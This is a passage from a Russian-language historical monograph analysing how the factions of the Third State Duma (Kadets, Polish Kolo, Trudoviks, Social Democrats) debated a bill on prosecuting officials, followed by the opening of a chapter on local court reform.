Кадеты в отличие от правых и октябристов полагали, что властный суверенитет исходит не от монарха, а от общества. О неразрывной связи в глазах представителей фракции законодательства и «общественного интереса» свидетельствует фраза кадетского оратора М.С. Аджемова, утверждавшего, что смысл принятия законопроекта заключается, в первую очередь, в том, чтобы депутаты могли «сказать стране, что… должностное преступление будет наказано» [5, ст. 2153]. Даже свою компромиссную позицию в законодательном учреждении по поводу административной гарантии конституционные демократы объясняли тем, что государство, т.е. правительство и думское большинство отражает новое «постреволюционное» соотношение общественных сил, которое ориентировано на «умеренность», в том числе и по отношению к административной гарантии. Но из этого обстоятельства они делали вывод о необходимости создания законодательных гарантий формирования гражданского общества, в целях построения правового государства. Именно в этом они видели основную цель своей парламентской деятельности.
Главным инструментом построения правового государства кадеты, безусловно, считали строжайшее разделение властей, обладающих по отношению друг к другу системой серьёзных «сдержек и противовесов» в интересах, в первую очередь, соблюдения законности. Так, М.С. Аджемов в прениях по данному законопроекту активно отстаивал право Думы на предание министров суду по уголовным делам. Однако применительно к данному законопроекту это, в первую очередь, должно было означать создание условий для судебного контроля над администрацией. В отличие от октябристов, кадеты полагали, что главной целью такого контроля должна стать не пропаганда в общественной среде укрепления доверия к власти, а установление объективной истины. Это будет способствовать упрочению влияния общества на власть и установлению в России правового государства, находящегося в тесной связи и взаимозависимости с гражданским обществом. Поэтому даже полная отмена административной гарантии не удовлетворяла их. Они «не надеялись», что передача дел чиновников в общий суд «всё изменит». По мнению левого кадета К.К. Черносвитова, российский суд является «служанкой администрации». Судебная власть, на взгляд кадетских ораторов, в России была зависима от административной в силу возможностей поощрять судей наградами и увольнять в дисциплинарном порядке находящихся в руках Министерства юстиции; положения прокуратуры как слуги «объединённого правительства»; подчинённого по отношению к прокуратуре положения судебных следователей и т.д.
Исходя из этого оценка ими правительственного законопроекта звучала, как «бег на месте». Главным его недостатком, по мнению кадетов, являлось то, что в нём сохранялся основной устой административной гарантии – право начальства обвиняемого должностного лица возбуждать преследование, что ставило чиновника под контроль не закона, а начальства и порождало фактическую безответственность должностных лиц. Кадеты отвергли многочисленные аргументы правительства, оправдывающие сохранение института гарантии и, в первую очередь, отсутствие в России системы административной юстиции. Суд, по их мнению, не должен быть специфичным в зависимости от специфичности преступлений. Кроме того, зарубежный опыт административной юстиции, по мнению кадетов, доказывал, что подобные суды обеспечивают свою главную функцию – охрану правопорядка применительно к преступлениям должностных лиц только в том случае, если их деятельность ограничивается лишь решением вопроса о наличии или отсутствии противозаконности деяния.
Весьма скептически отнеслись кадеты и к законопроекту, предложенному думской комиссией, состоящей, в основном, из представителей фракции «Союза 17 октября», и представлявшему точку зрения «доминирующего центра». Хотя они допускали компромисс с законопроектом комиссии, «считаясь с тем, что мы не одни законодатели» [5, ст. 2150], в интересах его принятия. В этом проявилось отличие их позиции от позиции фракций трудовиков и социал-демократов, базировавшейся на тезисе о бесполезности попыток «улучшения» режима и неверии в возможность содействия его эволюции легальными методами. Кадетские ораторы критиковали очень многие положения «улучшенного» думского законопроекта. Во-первых, их критике подверглось сохранение самого института административной гарантии. Во-вторых, они не были в восторге от предоставления прокурору лишь весьма ограниченного права самостоятельно возбуждать преследование против должностного лица. Реализация такого права, по мнению фракции, подвергала прокурора опасности взысканий со стороны Министерства юстиции, которое являлось органом исполнительной власти, действовавшей на основе принципа солидарности. В-третьих, тревогу фракции вызывало сохранение мощного административного элемента в составе судебных присутствий, разрешающих пререкания между начальством обвиняемого и прокуратурой. Все эти нормы законопроекта, по мнению ораторов от партии народной свободы, нарушали принцип разделения властей и сужали пространство независимого судебного контроля над «ведомственным интересом» администрации. Поэтому кадеты предложили собственные многочисленные поправки к законопроекту. Они носили компромиссный характер, но являлись весьма оригинальными и значимыми по отношению к нему.
Наиболее радикальный характер носила поправка, озвученная «левым» кадетом Н.В. Тесленко. Она возражала не только против сохранения института административной гарантии, но и против монополии прокурора как лица, принадлежащего к административному ведомству, лица, находящегося под контролем такого органа исполнительной власти, как министерство юстиции, на возбуждение уголовного преследования против должностных лиц. Поправка предполагала предоставление такого права также судебному следователю как лицу, относящемуся к судебной власти. Однако, видя решительную позицию октябристов, для которых подобное предложение было неприемлемо и, принимая во внимание угрозы правых голосовать в случае поддержки данного предложения категорически против законопроекта в принципе, кадеты решили не настаивать на голосовании этой поправки.
Что же касается необходимости максимального расширения права независимого от местной администрации прокурорского надзора на возбуждение уголовного преследования должностных лиц, то тут кадеты предпочли идти до конца. В течение всех трёх чтений законопроекта кадетские ораторы без устали отстаивали требование вменения прокурору в обязанность, а не предоставление ему ограниченного права (как предлагала комиссия) на проведение предварительного следствия в случае поступления к нему жалобы частного лица на действия чиновника. Мотивировала кадетская фракция это необходимостью ввести чётко установленный законом, а не зависящий от произвола прокурора, обязанного подчиняться распоряжениям административной власти, порядок возбуждения следствия по делам о преступлениях должностных лиц. Поправка была отклонена правыми и октябристским центром, однако весьма незначительным большинством голосов (147 против 118), что говорит о действенности аргументов кадетских ораторов повлиявших на мнение не только представителей двух леволиберальных фракций. Один из кадетских лидеров В.А. Маклаков уже в третьем чтении законопроекта выступил с категорическим осуждением позиции центра по поводу этой статьи законопроекта как «последней утраты прокурорским надзором его самостоятельности и подчинения действий прокурора видам правительства» [5, ст. 2274]. Кроме того, кадеты настаивали на распространении права на возбуждение уголовного преследования против должностных лиц на всех судебных прокуроров, не ограничиваясь формулировкой о «прокуроре суда коему подсудно дело», как указывалось в законопроекте думской комиссии. В этом они видели возможность расширить права прокурорского надзора. Однако и эта малозначительная поправка в силу компромиссных устремлений октябристов была провалена.
На реализацию принципа разделения властей путём установления независимого судебного контроля над администрацией направлены и поправки кадетов, касавшиеся так называемого особого присутствия, которое должно было разрешать «пререкания» между прокурором и начальством относительно необходимости возбуждения уголовного дела в отношении должностного лица. Вначале кадеты вместе с прогрессистами внесли поправку к ст. 1097, которая вообще предлагала упразднить это «присутствие». Мотивировалась это требование зависимостью административной части присутствия от своего начальства, а также зависимостью от исполнительной власти прокурора, который в случае неудовлетворённости решением присутствия в принципе мог перенести дело во вторую – чисто судебную инстанцию. Такая зависимость, по мнению кадетов, вместо выяснения объективной истины опять преследовала целью отстоять пресловутый административный интерес и прямо препятствовала реализации принципа законности. После отклонения поправки (84 голосами против 59) кадеты, тем не менее, продолжили борьбу за независимость судебного надзора над законностью действий администрации. Теперь, внеся поправку к ст. 1106, кадетские ораторы согласились на компромисс с центром и предложили учесть требования октябристов о необходимости наличия в присутствиях лиц, знакомых со спецификой административной деятельности. Для этого в состав особого присутствия предлагалось включить одного (а не трёх, как предполагал проект комиссии) представителя администрации. Причём в целях ограждения независимости суда таковым лицом должен был являться не вице-губернатор или губернатор, обязательное введение в состав присутствия которых фактически предлагала комиссия, а начальник обвиняемого или лицо, равное обвиняемому по «классу должности». Такой состав мог, по мнению кадетов, «сохранить главенство правосудия и гарантировать независимое рассмотрение дела» [5, ст. 2316]. Тем не менее, и это предложение при активной поддержке центра и правых было отвергнуто.
Выступая категорически против расширения административной гарантии в отношении высших должностных лиц (выражавшейся в том, что чиновники выше пятого класса предавались суду сенатом), кадеты, тем не менее, в интересах достижения компромисса и прохождения законопроекта ограничились определённым его улучшением. Улучшение это было направлено на создание более благоприятных условий для усиления независимого судебного контроля над администрацией. Они вместе с прогрессистами предложили поправку к ст. 1118. Согласно ей возбуждение преследования (а также предание суду, прекращение уголовного преследование, изменение подсудности и разделение предметов исследования) против чиновников высших рангов предполагалась производить не Первым департаментом Сената (по существу, чисто административным органом), а Соединённым Присутствием Первого и Уголовного кассационного департаментов, – не только административным, но и судебным учреждением. Ведь члены Первого департамента часто следовали не закону, а указаниям и повелениям, исходящим от «министерских скамей». Но, с другой стороны, присутствие членов Первого департамента наряду с судьями Кассационного в компромиссных целях учитывало требование октябристского центра обеспечить при рассмотрении дел должностных лиц наличие «сведущих экспертов» по административным делам. Такой порядок, по мнению кадетов, гарантировал всё же гораздо более беспристрастное рассмотрение дела. И здесь компромиссная тактика восторжествовала. Комиссия не высказалась против поправки, и она была, в конце концов, принята солидным большинством (95 голосов против 53).
В интересах соблюдения всё того же принципа разделения властей, независимости судебного контроля кадеты, объединившись с прогрессистами, попытались уравнять гарантии, предоставляемые прокуратуре и суду, в отношении возможности уголовного преследования против представителей этих ведомств (хоть на сей раз и неудачно). В отличие от судей (особый статус которых и особый порядок уголовного преследования, в отношении которых никогда кадетами как сторонниками неприкосновенности судебной власти под сомнение не ставился) согласно ст. 1091 к постановлениям о возбуждении уголовного преследования против прокуроров присутствие сената должно было приступать «не иначе как» по предложениям министра юстиции. Такую дополнительную гарантию со стороны административного органа в отношении прокуратуры кадеты считали абсолютно излишней и предлагали отменить.
Ещё одним методом, с помощью которого кадеты в своей законотворческой практике добивались реализации идеи правового государства в России, было содействие формированию структур, способствующих развитию гражданского общества – органов, содействующих налаживанию общественного контроля над бюрократией. В первую очередь, под таковыми кадеты понимали органы местного земского и городского самоуправления. Вместе с прогрессистами кадеты в прениях по поводу законопроекта отстаивали максимально возможную в тех условиях независимость от администрации местного самоуправления и максимально возможный контроль с его стороны над законностью действий местной администрации. Поэтому они категорически выступили против поправки октябристов в интересах сиюминутной электоральной партийной конъюнктуры, лишавшей земские и городские органы самоуправления права возбуждения преследования и начала предварительного следствия в пользу административных органов губернии. Леволиберальные фракции заявили, что необходимо предоставление монопольного права на контроль за проведением предварительного следствия над должностными лицами органам самоуправления, «исходя из точки зрения самостоятельности земских учреждений, и полагая, что право надзора за своими служащими легче всего осуществимо земскими собраниями и всего более присуще именно им» [5, ст. 2280]. И аргументы левых либералов, в конце концов, заставили октябристский центр пойти на попятную и оставить статью в прежней редакции.
Наконец, необходимо отметить, кадетские ораторы прекрасно понимали, что даже установление полностью независимого судебного контроля – не панацея от чиновничьего беззакония. Один из лидеров фракции партии народной свободы, В.А. Маклаков, понимая проблему более широко, обратил внимание парламентариев на пресловутый «третий пункт», дававший возможность начальству чиновника совершенно свободно, даже без указания причин уволить его. Тем самым поощрялось повиновение не праву, а воле высшего начальства, которое в силу сохранения самого института административной гарантии и многочисленных привилегий пользовалось известной процессуальной автономией. Поскольку устранение этой проблемы формально лежало вне цели данного законопроекта, Маклаков предложил приступить к её решению, приняв, по крайней мере, формулу перехода к очередным делам. В ней Государственная дума, должна была выразить желание, чтобы правительство в скорейшем времени внесло законопроект об отмене ст. 788 Уст. Службы, поощрявшей чиновничий произвол. Эта формула перехода была принята подавляющим большинством голосов. Обращено было кадетами и внимание на нищенское жалование чиновников, также стимулировавшее злоупотребления должностных лиц.
Ещё одним основополагающим принципом правового государства является принцип равенства всех перед законом. Причём кадеты не ограничились уже упомянутым резко отрицательным отношением к привилегиям чиновников выше пятого класса, привлечение которых к суду было более сложным и «предвзятым», нежели нижестоящих. С подачи кадетов была внесена поправка, предусматривавшая исключение ст. 1123 (п. 2.), которая предоставляла право суду определять, кто именно из свидетелей – должностных лиц должен явиться лично, а кто может быть допрошен на месте. Кадеты мотивировали своё предложение стремлением оградить принцип законности. Причём произвола они опасались в равной мере и в отношении представителей административного и судебного ведомств. Кроме того, кадеты предложили в тех же видах исключить ссылки на статьи Уголовного Уложения, выводящие из общего порядка преследования должностных лиц служащих банковских учреждений, которые по-прежнему должны были судиться не присяжными, а сословными представителями. Однако даже эти весьма скромные и носящие компромиссный характер поправки вызвали возражения октябристов и были провалены Думой. Причём провалены по маловразумительным мотивам. Октябристы, по их словам, не желали нарушать уже «действующий закон», ломать структуру «общего построения закона» и т.д. Истинная причина была всё та же – необходимость поиска компромисса с монархом, а значит, с правительством, и второй палатой, необходимость добиваться «достижения единства власти» практически любой ценой. Всё это ярко отличало их позицию от кадетской.
Признаком правового государства является, как известно, и реальная, а не декларативно провозглашённая свобода личности, гарантированность прав и свобод человека и гражданина. Содействовать реализации этого принципа на практике кадеты постарались в ходе обсуждения данного законопроекта. Они выступили инициаторами трёх поправок, которые преследовали целью гарантировать права частных лиц по отношению к лицам должностным. Прежде всего, в отношении соблюдения неприкосновенности личности и собственности. Первая поправка касалась ст. 1102, в которую кадеты предложили внести пункт, согласно которому истец мог требовать полного ознакомления с материалами дела, возбуждённого против должностного лица, и выдачи ему копии последнего. Причём обращает на себя внимание то обстоятельство, что в отличие от трудовиков, внёсших аналогичную поправку, кадеты, следуя принципу равенства всех перед законом и судом, предложили предоставить такое же право и ответчику. Настойчивость фракции склонила чашу весов в их пользу, и они добились того, что в третьем чтении центр, наконец, поддержал их, и статья была внесена в текст проекта, предложенного Думой для голосования в кадетской редакции [17, с. 124]. Чего нельзя сказать о второй поправке, предполагавшей сокращение срока подачи жалобы в «пререкательную» инстанцию с месяца до двух недель. Мотивировка, предложенная фракцией Партии народной свободы, указывала на то, что целью и здесь было гарантировать интересы частного лица против вероятного произвола государственной власти. Кадеты предполагали, что сокращение срока будет содействовать тому, чтобы «не выветривалась сущность дела», что помогло бы в большей степени защитить интересы истца. Наконец, для достижения той же цели кадеты предложили максимально расширить принцип «закон обратной силы не имеет» применительно к данному законопроекту, введя норму, позволяющую рассматривать согласно обновлённой процедуре все дела, по которым не состоялось ещё судебного приговора. Тем самым они выступили против предлагаемого комиссией решения ограничиться рассмотрением в новом порядке только тех дел, по которым не состоялось ещё предания суду. К сожалению, октябристы, повинуясь стремлению сохранить консенсус с правительством любой ценой, и здесь отклонили предложение леволиберальной фракции, весьма невнятно аргументировав свою позицию наличием некой «грани», переходить которую они не желают.
На основании вышеизложенного можно сделать вывод о том, что поправки, внесённые фракцией партии народной свободы при обсуждении законопроекта были направлены на реализацию идеи построения правового государства в России. Это было обусловлено их взглядами на сущность и предназначение государственной власти как власти, исходящей от народа и обеспечивающей неприкосновенность законных прав частных лиц, в том числе и от представителей государственной власти. Поправки были направлены на создание реальных гарантий для соблюдения принципа разделения властей, независимого судебного контроля над администрацией; усиления роли и полномочий органов местного самоуправления как институтов гражданского общества; верховенства права; равенства всех перед законом.
Точка зрения на законопроект польского коло, объединявших умеренных депутатов от бывшего Царства Польского и примыкавшего по отношению к ряду вопросов к левым либералам, как и кадетско-прогрес-систская резко отличалась и от точки зрения правительства, и «центра» Государственной думы. Причины этого состояли в своеобразии взглядов коло на сущность и предназначение государства и права. Оно считало основной принцип правового государства – принцип верховенства права – самоценностью, а не средством укрепления властной вертикали, как правительство или пропагандистским лозунгом, который должен будет укрепить пошатнувшееся доверие к монарху и третьеиюньскому политическому режиму, как октябристы. Причины острого политического кризиса, охватившего Российскую империю в начале века, по мнению ораторов от коло, лежали не в ослаблении централизации и единства административной власти (как полагало правительство и правые октябристы) и не в разложении её «чуждыми» элементами (как считали правые фракции), а в несоблюдении государством принципа верховенства права. «Государство поколебалось в силу отсутствия законности», – так высказался о событиях 1905–1907 гг. лидер фракции – депутат Л.К. Дымша. Именно на этом принципе, с их точки зрения, должно было базироваться ограждение прав частных лиц, соблюдение которых они считали главной целью законопроекта. Исходя из этих взглядов они весьма критично отнеслись как к правительственному законопроекту, так и к поправкам, предложенным думской комиссией. В самом сохранении административной гарантии коло видело, несмотря на все уверения правительства в обратном, лишь «ведомственный интерес», который «поглощал силу и значение закона». Комиссия вместо того, чтобы полностью устранить его, «остановилась на полпути». Прокурор как инстанция, призванная охранять законность, не должен был, по их мнению, зависеть от согласия начальства на проведение предварительного следствия, поскольку последнее чревато многочисленными препятствиями в выяснении объективной истины. Особое присутствие, признанное разрешать «разномыслие» между прокурором и начальством подозреваемого по вопросу необходимости уголовного преследования, они считали абсолютно излишним, т.к. гарантировать права обвиняемого (на необходимость чего упирало и правительство и думский «центр») вполне способна обвинительная камера. Другие либеральные фракции – кадеты и прогрессисты – в принципе были сторонниками подобной точки зрения, однако позиция коло отличалась от них особой бескомпромиссностью. Хотя Л.К. Дымша и сомневался, подобно левым либералам, во вступлении законопроекта в силу, прежде всего, консервативной позиции Государственного Совета, однако не считал это поводом для того, чтобы идти на какие-либо уступки (которые были предложены левыми либералами в виде многочисленных поправок к законопроекту). Единственным приемлемым итогом законопроекта для оратора от коло являлось «совершенное отпадение» гарантии. Для этого он требовал от Думы безоговорочно изменить законопроект самым кардинальным образом, вменив прокурору в обязанность проводить предварительное следствие по делам должностных лиц и упразднить судебно-административные присутствия. Однако, не ограничившись этими предложениями, коло пошло далее и призвало гарантировать соблюдение законности чиновниками внесением более радикальных изменений в действующее административное законодательство. Дымша, в частности, предложил гарантировать «классу административных чиновников» неприкосновенность путём установления принципа несменяемости. Для реализации этого предложения, по их мнению, следовало в первую очередь отменить п. 3. ст. 762 т. III Свода Законов Российской империи, предоставлявшего начальству чиновников право увольнять их фактически без объяснения причин. Мотивировалось это предложение тем, что в условиях безнаказанности высших чиновников, которые могли предаваться суду лишь с санкции монарха, добиться того, чтобы «низы» бюрократического аппарата исполняли повеления закона, а не «безнаказанного» начальства было очень сложно. Коло в своём бескомпромиссном стремлении добиться полной и окончательной отмены административной гарантии было далеко от беспочвенного утопизма и предлагало реальные пути решения проблемы, хотя и заимствованные из европейского опыта, но целиком и полностью мотивированные реалиями российской политической действительности.
Таким образом, на примере участия польской национальной фракции в рассмотрении данного законопроекта можно сделать вывод о том, что польское коло выступало в Думе в качестве сторонника и активного пропагандиста идеи правового государства в его «классическом» западном варианте и являлось наиболее последовательным и бескомпромиссным сторонником его основных постулатов – верховенства закона и разделения властей – из числа либеральных фракций Государственной Думы.
По мнению трудовиков и социал-демократов, выступавших в процессе обсуждения законопроекта с близких позиций, в России не было ни следов правового государства, ни, самое главное, предпосылок для его возникновения. Главный принцип правового государства – принцип верховенства права – не соблюдался. С точки зрения главного оратора от трудовиков А.Е. Кропотова в России «соблюдаются только те законы, которые выгодны для чиновников». Согласно представлению основного оратора от фракции социал-демократов Т.О. Белоусова в России имело место лишь «бесправие населения и безответственность власти», а «пирамида из 14 классов» представляла собой «настоящую итальянскую мафию» [5, ст. 2122]. В силу этого принцип равенства всех перед законом тоже постоянно нарушался. Причина этого крылась, на взгляд социалистов, в первую очередь, в классовой природе Российского государства. Законы для граждан, по мнению того же Кропотова, различны в зависимости от того, кто является этими гражданами – «тот гражданин, которого в Финляндии гнут в три погибели или гражданин князь Мещерский». По мнению же социал-демократов (несколько отличному от трудовиков) государственная власть в России носила не только классовый, но и классово-идеологизированный характер. Идеология власти – это идеология черносотенного движения, идеология партии «Союз русского народа». «Власть вошла в альянс с союзниками» [5, ст. 2124], – так резюмирует её сущность Т.О. Белоусов.
В силу этого, на взгляд обеих главных социалистических фракций, в России отсутствовала структура государственной власти, характерная для правового государства. Народное представительство, с точки зрения левых, было бессильно перед второй палатой и правительством. «Правительство считается только с теми пожеланиями Государственной думы, которые выгодны для него», «соблюдаются только те законы, которые выгодны для чиновников» [5, ст. 2121], – так видели ситуацию ораторы от трудовиков. Кроме того, сама роль законодательной власти, точнее её право-октябристского большинства, по мнению левых, заключалась лишь в том, чтобы являться идеологами антинародного режима, выступать в качестве ширмы, прикрывающей от общества истинную его сущность, представляющую собой прежний самодержавно-бюрократический строй. Правые и октябристы, с их точки зрения, в равной мере были «людьми, живущими идеалами прошлого, отражающими интересы тех слоёв общества, для которых нет будущего», что по выражению социал-демократи-ческого оратора и заставляло их «чинить прорехи старого строя» [5, ст. 2129]. Поэтому антинародная власть, по мнению социалистов, прямо поощряла чиновничьи злоупотребления, чему свидетельством выступало постоянное «ухудшение законопроекта» (который, действительно, сравнительно с законопроектом, внесённым в «революционные» Думы многое потерял, если брать во внимание степень ограничения пресловутой административной гарантии) [5, ст. 2143].
Такой взгляд на сущность современной им политической структуры обусловливает полный пессимизма взгляд как на правительственный законопроект, так и на проект, вышедший из недр думской комиссии. По мнению трудовиков, законопроект, направленный к некоторому расширению прав прокуратуры по надзору над законностью действий должностных лиц бесполезен. Во-первых он сохранял административную гарантию как институт, который подкреплён многочисленными ограничениями, ставящими представителей чиновничьего мира в привилегированное положение (судебное присутствие, разбиравшее пререкания между прокурором и начальством, включающее в себя представителей администрации, ограниченность возможности рассмотрения дел окружными судами с присяжными и т.д.). Во-вторых, по мнению левых, при существующем строе «нельзя и прокуратуре доверяться» [5, ст. 2148], т.к. она являлась, с их точки зрения, институтом, полностью зависимым от администрации. В-третьих, наконец, из того обстоятельства, что административная и законодательная власти действуют как части единого антинародного режима, вытекало, по мнению левых, то обстоятельство, что даже такой законопроект никогда не станет законом. Его внесение, по мнению левых, преследовало единственную цель – обман народа, попытку пропагандистскими методами укрепить доверие к антинародному режиму. В устах правительства выступления по поводу необходимости принятия этого законопроекта являлись «отпиской», а в устах представителя центра – «агитационной речью». Таким образом, социалистические фракции придерживались мнения о том, что подобные законопроекты – полумеры, сущность которых определялась ими поговоркой – «сулилась синица море зажечь» [5, ст. 2130], абсолютно никакого значения для уменьшения произвола и беззакония администрации не имели. «Латание прорех» реакционного режима бесполезно, необходимо его устранение. «Гангрену вырезают целиком и полностью» [5, ст. 2146], – резюмировал Кропотов. Новый режим, который должен был устранить беззакония в деятельности государственного аппарата, предполагал, прежде всего, установление ответственности правительства перед «истинным народным представительством», избранным на основе всеобщего, равного, прямого избирательного права; широкое местное самоуправление с выборностью чиновничьего аппарата; уменьшением числа должностных лиц; выборность администрации и суда «сверху донизу»; учреждение самого широкого спектра демократических свобод: слова, собраний, союзов, неприкосновенности личности, жилища, имущества, передвижения. Абсолютизируя не вызывающую сомнения, на современный взгляд, максиму «должностные лица существуют для населения, а не население для них», ораторы от социалистов грешили утопизмом, полагая, что выборная администрация устранит все негативные стороны «чиновничьего правления». Принцип демократизма, таким образом, поглощал принципы либерализма, в том числе и основополагающий – законности. Ведь требование создания бесконтрольного народного представительства с ответственностью перед ним всех должностных лиц фактически означало пренебрежение принципом разделения властей. Даже суд трудовиками трактовался, прежде всего, как «суд народной совести», а не «формального права».
Провозглашая, таким образом, полную бесполезность закона, уголовного наказания в борьбе с чиновничьим злоупотреблениями и выдвигая альтернативное требование свержения существующего режима и построение «подлинной народной демократии», левые фракции полагали, что такое свержение может в силу классовой природы государства произойти лишь «снизу», путём народной революции. Эта программа открыто провозглашалась ими при обсуждении законопроекта. По их словам, «недалеко то время, когда придёт снова время 1905 г. Тогда свободный народ изберёт свободное народное представительство и тогда будет действительно хорошо народу» [5, ст. 2123]. Единственным смыслом своей деятельности в Думе социалисты, естественно, считали максимальное расшатывание основ существующего режима. Поэтому конкретные поправки к законопроекту носили ярко выраженный пропагандистский и демагогический характер, характеризовались правовым нигилизмом и волюнтаризмом. Главным требованием, которые выдвигали ораторы от трудовиков и социал-демок-ратов, было полное и абсолютное устранение административной гарантии. Разбирательство дел должностных лиц должно было происходить в общих судах и на общих основаниях. В связи с этим трудовики в лице одного из видных ораторов фракции – А.А. Булата в первом же чтении предложили заменить многочисленные статьи законопроекта (с 1066 по 1123) фразой о рассмотрении таких дел «в порядке установленном… для общих преступлений». В этом тезисе они в принципе не расходились с большинством Думы. Однако октябристы отвергали его немедленное осуществление в силу необходимости компромисса с исполнительной властью назначенной верховным сувереном – монархом, а левые либералы считали возможным частичное улучшение законопроекта, поскольку признавали мощную преобразующую силу права и, самое главное, признавали необходимость и возможность содействия эволюции режима в сторону правового государства легальными методами парламентской борьбы. Кроме того, представители социалистов в отличие от либеральных фракций категорически выступали против построения в России системы административной юстиции как альтернативы административной гарантии. Фактически в качестве образца ими предлагалось ввести англосаксонское законодательство, которое предполагало безальтернативное преследование должностных лиц в системе общих судов. Не принималось, таким образом, во внимание, что Россия столетиями развивалась в рамках романо-германской правовой семьи, с её делением права на публичное и частное, институтом «административного процесса», связанного с «фетишизацией письменного закона» и т.д. Это дало, в частности, докладчику судебной комиссии октябристу Н.И. Антонову справедливый повод характеризовать предложение трудовика Булата как «несуществующее право» [5, ст. 2152]. Не поддержали столь беспочвенную и бескомпромиссную позицию и кадеты. Поэтому поправка, внесённая трудовиками, была провалена.
Наконец, ораторы-социалисты намеревались предоставить потерпевшему не просто равные с ответчиком и прокурором права в судебном процессе, а права, которые можно охарактеризовать как «преимущественные». Эта позиция вытекала из точки зрения социалистов о необходимости доверить охрану «существенных прав граждан, защита которых особенно важна в общественных интересах» в силу «антинародности» режима, представителям которого (в том числе и прокуратуре) нельзя доверять, непосредственно народу. С точки зрения трудовиков и социал-демократов, нужен был «как можно более широкий простор» для суда над чиновниками. Необходимо было максимальное облегчить преследование по суду чиновников по сравнению с преследованием частных лиц. Поэтому поправки, внесённые представителями трудовой фракции, во втором чтении предусматривали максимальное «расширение прав потерпевших» в ходе процесса. Истцу предполагалось предоставить не только равное с прокурором право «возбуждать и поддерживать» обвинение перед судом, но и в случае отказа прокурора в возбуждении дела самому возбуждать такое обвинение, фактически занимая его место. Кроме того, оратор от трудовиков Н.Я. Ляхницкий предложил расширить возможность преследования должностных лиц, признав потерпевшими от преступного деяния по службе всех тех, «публичным правам коих нанесён ущерб означенным деянием, хотя бы они не понесли от сего непосредственного вреда и убытков», предоставив этим лицам право обжаловать состоявшееся определение наряду с прокурором [5, ст. 2153]. Наконец, предполагалось предоставить право потерпевшим или их представителям присутствовать на заседании особых совещаний и отстаивать там свои интересы наряду с прокурором, причём в открытом заседании. Все эти поправки, сужающие полномочия государственных органов и должностных лиц по контролю над законностью действий чиновников в пользу частных лиц, в целом, несут на себе печать общей недооценки прогрессивной роли государства и права и острого недоверия не только к политическому режиму, но и современному государству вообще. Понятно, что такое мировоззрение не могло найти сочувствия в стенах Третьей Государственной думы и все эти поправки были отклонены.
Таким образом, на основании вышеизложенного можно сделать вывод о том, что позиция социалистических фракций по отношению к законопроекту базировалась на полном и абсолютном недоверии к современному им Российскому государству в силу его классовой природы, которое вряд ли может быть признано оправданным. Это привело к нежеланию признавать: общие закономерности политико-правового развития, своеобразие политико-правового элемента цивилизационной составляющей России, а в итоге, к вытекающему из политического максимализма правовому нигилизму и волюнтаризму. Эта позиция, в свою очередь, приводила их к отрицанию возможности борьбы с нарушениями законности должностными лицами в рамках существующей политической системы. Следствием этого явилось стремление к подрыву всеми возможными способами основ существующего политического режима как основной цели своей законотворческой деятельности. Поэтому поправки трудовиков к законопроекту сводились в сущности к предоставлению «избыточных» гарантий для личности, клонящихся к явному ущербу для современной им «антинародной» государственной власти и были рассчитаны, в основном, на пропагандистский эффект, который мог «разбудить народные массы».
Таким образом, анализируя процесс обсуждения законопроекта фракциями Думы можно сделать общий вывод о том, что в силу, по-видимому, прежде всего различных «цивилизационных предпочтений» все они по-разному относились к идее правового государства (обойти важнейшие принципы которого, выражая свою позицию по поводу будущего закона, было невозможно). Правые являлись ярыми противниками идеи правового государства. Октябристы использовали эту идею, прежде всего, в пропагандистских целях для укрепления доверия общества к власти. Левые фракции выступали с позиции неверия в возможности содействовать его построению легальными, правовыми путями. Лишь леволиберальные фракции – кадеты и прогрессисты (на базе определённого «парламентского компромисса») и польское коло (основываясь на бескомпромиссном классическом понимании модернизационных постулатов) выступали последовательными сторонниками реализации этой идеи на практике.
3 ОБСУЖДЕНИЕ ЗАКОНОПРОЕКТА О ПРЕОБРАЗОВАНИИ МЕСТНОГО СУДА В III ГОСУДАРСТВЕННОЙ ДУМЕ
Законопроект «О преобразовании местного суда», выработанный Министерством юстиции во исполнение императорского указа от 12 декабря 1904 г., являлся одним из основных законодательных актов, посредством которых правительство П.А. Столыпина собиралось произвести радикальное реформирование местного управления, что, в свою очередь, было частью обширной программы российской модернизации, которая должна была способствовать преодолению отсталости России и упрочению её социальной стабильности. Исходя из его важности правительство последовательно вносило законопроект в Первую и во Вторую Государственные думы, однако ситуация бескомпромиссного политического противоборства между обеими «революционными» представительствами и императорской властью не способствовала спокойному парламентскому анализу законопроекта. В результате быстрого роспуска обеих Дум законопроект так и остался нерассмотренным. Только Третья Государственная дума смогла не только приступить к обсуждению законопроекта, но и закончить его, передав во вторую законодательную инстанцию империи. После длительного обсуждения в Государственном совете законопроект с весьма существенными поправками (в частности, предполагалось сохранение хотя и в реформированном виде волостного суда) поступил на обсуждение согласительной комиссии из представителей верхней и нижней законодательных палат, а затем на повторное обсуждение в Государственную думу третьего созыва. С большинством ограничительных поправок думское большинство в интересах дальнейшего прохождения законопроекта согласилось и после утверждения в Государственном совете, а затем и императором 15 июня 1912 г. законопроект стал законом. Впрочем, введение его в действие было связано уже с историей Четвёртой Государственной думы, которая 26 июня 1913 г. приняла законопроект, вводивший закон о преобразовании местного суда в действие с первого января 1914 г. Закон первоначально был введён в действие всего в 10 губерниях, но к 1917 г. фактически действовал уже в 20 губерниях европейской России.
Сущность законопроекта «О преобразовании местного суда» заключалась в следующем. Волостной суд, суд земского участкового начальника, а также городской суд и суд уездного члена окружного суда упразднялись. Взамен них устанавливался общий для всех граждан, независимо от сословных различий, мировой суд, состоящий из одного мирового судьи, положение которого проект стремился определить, сохраняя нормы судебных уставов 1864 г., которые относились к мировому суду. Проект ориентировался на необходимость обеспечить: выборность мирового суда (выборы проводились земскими и городскими органами самоуправления с учётом имущественного и образовательного ценза); его независимость (причём думская комиссия в видах его обеспечения отвергла предложенное министерским проектом включение мирового суда в общую судебную организацию); приближение суда к населению (что предполагалось достигнуть включением в состав мирового участка территории не более чем трёх волостей, и расширением подсудности мировых судов); а также упрощение и облегчение для населения ведения гражданского и отчасти уголовного процесса (расширением возможности для апелляции и кассации, ограничением возможности применять местные обычаи, рядом гарантий обеспечивающих неприкосновенность личности, ограничением состязательности и минимизацией формализма процесса и т.д.). И правительство, и октябристское большинство думской комиссии по обсуждения законопроекта равным образом признавали невозможность в видах реализации вышеуказанных принципов дальнейшего сохранения волостного суда, суда земского начальника и прочих подобных им судов. В один голос они признавали их устаревшими, негодными, подлежащими замене единоличным судьёй мирового участкового суда вследствие, прежде всего, сословного характера этих судов, низкого нравственного, умственного и образовательного уровня их членов, а также зависимости волостного суда от администрации и смешения судебных и исполнительных полномочий в лице земского участкового начальника. Однако не все фракции Думы были согласны с ключевыми тезисами законопроекта. В частности, с особым 